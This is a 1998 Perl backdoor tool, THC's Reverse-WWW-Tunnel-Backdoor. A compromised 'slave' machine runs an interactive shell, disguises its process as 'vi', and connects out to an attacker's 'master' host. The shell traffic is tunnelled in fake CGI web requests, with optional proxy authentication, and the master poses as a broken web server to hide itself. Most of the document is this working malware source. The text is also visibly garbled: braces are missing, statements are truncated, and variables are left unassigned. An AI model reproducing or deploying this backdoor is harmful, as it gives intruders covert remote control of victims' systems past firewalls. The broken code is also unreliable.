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# Reverse-WWW-Tunnel-Backdoor v1.6
# (c) 1998 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
# Check out http://r3wt.base.org for updates
# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls"
# available at the website above in the "Articles" section.
# Greets to all THC, ADM, arF and #bluebox guys
# verified to work on Linux, Solaris, AIX and OpenBSD
# BUGS: some Solaris machines: select(3) is broken, won't work there
# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ...
# we can't make proper receive checks here. Workaround implemented.
# v1.6: included www-proxy authentication ;-))
# v1.4: porting to various unix types (and I thought perl'd be portable...)
# v1.3: initial public release of the paper including this tool
# GENERAL CONFIG (except for $MASK, everything must be the same
# for MASTER and SLAVE is this section!)
$CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char!
$MASK="vi"; # for masking the program's process name
$PASSWORD="THC"; # anything, nothing you have to rememeber
# (not a real "password" anyway)
# MASTER CONFIG (specific for the MASTER)
$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080)
$SERVER=""; # the host to run on (ip/dns) (the SLAVE needs this!)
# SLAVE CONFIG (specific for the SLAVE)
$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh)
$DELAY="3"; # time to wait for output after your command(s)
#$TIME="00:01"; # time when to connect to the master (unset if now)
#$DAILY="yes"; # tries to connect once daily if set with something
#$PROXY=""; # set this with the Proxy if you must use one
#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one
#$PROXY_USER="user"; # username for proxy authentication
#$PROXY_PASSWORD="pass"; # password for proxy authentication
#$DEBUG=""; # for debugging purpose, turn off when in production
$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris
# END OF CONFIG # nothing for you to do after this point #
################## BEGIN MAIN CODE ##################
require 5.002;
use Socket;
$|=1; # next line changes our process name
if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; }
undef $DAILY if (! $TIME);
if ( !($PROXY) || !($PROXY_PORT) ) {
undef $PROXY;
undef $PROXY_PORT;
$protocol = getprotobyname('tcp');
if ($ARGV[0] ne "") {
if ($ARGV[0] eq "-h") {
print STDOUT "no commandline option : daemon mode\n";
print STDOUT "using \"-h\" as option : this help\n";
print STDOUT "any other option : slave mode\n";
} else {
print STDOUT "starting in slave mode\n";
$SLAVE_MODE = "yeah";
if (! $SLAVE_MODE) {
} else {
############### SLAVE FUNCTION ###############
sub slave {
$pid = 0;
if ($PROXY) { # setting the real config (for Proxy Support)
$REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT
$PROXY_SUFFIX = "Pragma: no-cache\n";
} else {
AGAIN: if ($pid) { kill 9, $pid; }
if ($TIME) { # wait until the specified $TIME
$TIME =~ s/^0//; $TIME =~ s/:0/:/;
= localtime(time);
$t=$hour . ":" . $min;
while ($TIME ne $t) {
sleep(28); # every 28 seconds we look at the watch
= localtime(time);
$t=$hour . ":" .$min;
print STDERR "Slave activated\n" if $DEBUG;
if ($DAILY) { # if we must connect daily, we'll
if (fork) { # fork the daily shell process to
sleep(69); # ensure the master control process
goto AGAIN; # won't get stuck by a fucking cmd
} # the user executed.
print STDERR "forked\n" if $DEBUG;
$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
$remote = sockaddr_in($REAL_PORT, $address);
$forked = 0;
GO: close(THC);
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
if (! $forked) { # fork failed? fuck, let's try again
pipe R_IN, W_IN; select W_IN; $|=1;
pipe R_OUT, W_OUT; select W_OUT; $|=1;
$pid = fork;
if (! defined $pid) {
close THC;
close R_IN; close W_IN;
close R_OUT; close W_OUT;
goto GO;
$forked = 1;
if (! $pid) { # this is the child process (execs $SHELL)
close R_OUT; close W_IN; close THC;
print STDERR "forking $SHELL in child\n" if $DEBUG;
open STDIN, "<&R_IN";
open STDOUT, ">&W_OUT";
open STDERR, ">&W_OUT";
exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
close R_IN; close W_OUT;
} else { # this is the parent (data control + network)
close R_IN;
sleep($DELAY); # we wait $DELAY for the commands to complete
vec($rs, fileno(R_OUT), 1) = 1;
print STDERR "before: allwritten2stdin\n" if $DEBUG;
select($r = $rs, undef, undef, 30);
print STDERR "after : wait for allwritten2stdin\n" if $DEBUG;
sleep(1); # The following readin of the command output
$output = ""; # looks weird. It must be! every system
vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-((
print STDERR "before: readwhiledatafromstdout\n" if $DEBUG;
while (select($w = $ws, undef, undef, 1)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
print STDERR "after : readwhiledatafromstdout\n" if $DEBUG;
print STDERR "before: fucksunprob\n" if $DEBUG;
vec($ws, fileno(W_OUT), 1) = 1;
while (! select(undef, $w=$ws, undef, 0.001)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
print STDERR "after : fucksunprob\n" if $DEBUG;
print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG;
print W_OUT "\000" || goto ENDE;
print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG;
while (1) {
read R_OUT, $readout, 1 || last;
last if ($readout eq "\000");
$output = $output . $readout;
print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG;
&uuencode; # does the encoding of the shell output
$encoded = $REAL_PREFIX . $encoded;
$encoded = $encoded . $PROXY_SUFFIX if ($PROXY);
$encoded = $encoded . "\n";
print STDERR "connecting to remote, fail->exit\n" if $DEBUG;
connect(THC, $remote) || goto ENDE; # connect to master
print STDERR "send encoded data, fail->exit\n" if $DEBUG;
send (THC, $encoded, 0) || goto ENDE; # and send data
$input = "";
vec($rt, fileno(THC), 1) = 1; # wait until master sends reply
print STDERR "before: wait4answerfromremote\n" if $DEBUG;
while (! select($r = $rt, undef, undef, 0.00001)) {}
print STDERR "after : wait4answerfromremote\n" if $DEBUG;
print STDERR "read data from socket until eod\n" if $DEBUG;
while (1) { # read until EOD (End Of Data)
print STDERR "?" if $DEBUG;
# OpenBSD 2.2 can't recv here! can't get any data! sucks ...
recv (THC, $readin, 1, 0) || undef $error;
if ((! $error) and (! $BROKEN_RECV)) { goto OK; }
print STDERR "!" if $DEBUG;
goto OK if (($readin eq "\000") or ($readin eq "\n")
or ($readin eq ""));
$input = $input . $readin;
OK: print STDERR "\nall data read, entering OK\n" if $DEBUG;
$input =~ s/\n//gs;
&uudecode; # decoding the data from the master
print STDERR "if password not found -> exit\n" if $DEBUG;
goto ENDE if ( $decoded =~ m/^$PASSWORD/s == 0);
$decoded =~ s/^$PASSWORD//;
print STDERR "writing input data to $SHELL\n" if $DEBUG;
print W_IN "$decoded" || goto ENDE; # sending the data
sleep(1); # to the shell proc.
print STDERR "jumping to GO\n" if $DEBUG;
goto GO;
ENDE: kill 9, $pid; $pid = 0;
############### MASTER FUNCTION ###############
sub master {
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
listen(THC, 3) || die "can't listen\n"; # print the HELP
print STDOUT '
Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ...
Introduction: Wait for your SLAVE to connect, examine it\'s output and then
type in your commands to execute on SLAVE. You\'ll have to
wait min. the set $DELAY seconds before you get the output
and can execute the next stuff. Use ";" for multiple commands.
Trying to execute interactive commands may give you headache
so beware. Your SLAVE may hang until the daily connect try
(if set - otherwise you lost).
You also shouldn\'t try to view binary data too ;-)
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
friends if you don\'t like using vi in a delayed line mode ;-)
To exit this program on any time without doing harm to either
MASTER or SLAVE just press Control-C.
Now have fun.
YOP: print STDOUT "\nWaiting for connect ...";
$remote=accept (S, THC) || goto YOP; # get the connection
($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE
$slave=gethostbyaddr($r_slave, AF_INET); # data.
$slave="unresolved" if ($slave eq "");
print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
select S; $|=1;
select STDOUT; $|=1;
$input = "";
vec($socks, fileno(S), 1) = 1;
while (1) { # read the data sent by the slave
while (! select($r = $socks, undef, undef, 0.00001)) {}
recv (S, $readin, 80, 0) || undef $error;
if ((! $error) and (! $BROKEN_RECV)) {
print STDOUT "[disconnected]\n";
$readin =~ s/\r//g;
$input = $input . $readin;
last if ( $input =~ m/\n\n/s );
&hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 );
$input =~ s/^.*($CGI_PREFIX)\??//s;
$input =~ s/\n.*$//s;
&uudecode; # decoding the data from the slave
&hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 );
$decoded =~ s/^$PASSWORD//s;
$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
print STDOUT "$decoded"; # showing the slave output to the user
$output = <STDIN>; # and get his input.
&uuencode; # encode the data for the slave
send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it
close (S);
print STDOUT "sent.\n";
goto YOP; # wait for the next connect from the slave
###################### MISC. FUNCTIONS #####################
sub uuencode { # does the encoding stuff for error-free data transfer via WWW
$output = $PASSWORD . $output; # PW is for error checking and
$uuencoded = pack "u", "$output"; # preventing sysadmins from
$uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird
/'zcadefghjklmnopqrstuv' # data. No real
/; # security!
$uuencoded =~ tr/"'"/'b'/;
if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb
$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
$cut_length = 4099 - (length $REAL_PREFIX);
$uuencoded = pack "a$cut_length", $uuencoded
if ($codelength > 4111);
$encoded = $uuencoded;
$encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE);
sub uudecode { # does the decoding of the data stream
$input =~ tr/'zcadefghjklmnopqrstuv'
$input =~ tr/'b'/"'"/;
$decoded = unpack "u", "$input";
sub base64encoding { # does the base64 encoding for proxy passwords
$encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD;
$encoded_string = substr(pack('u', $encode_string), 1);
$encoded_string =~ tr|` -_|AA-Za-z0-9+/|;
$padding = (3 - length($encode_string) % 3) % 3;
$encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding;
$PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n";
sub hide_as_broken_webserver { # invalid request -> look like broken server
send (S, "<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>".
"<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n", 0);
close S;
print STDOUT "Warning! Illegal server access!\n"; # report to user
goto YOP;
# END OF PROGRAM # (c) 1998 by <vh@reptile.rug.ac.be>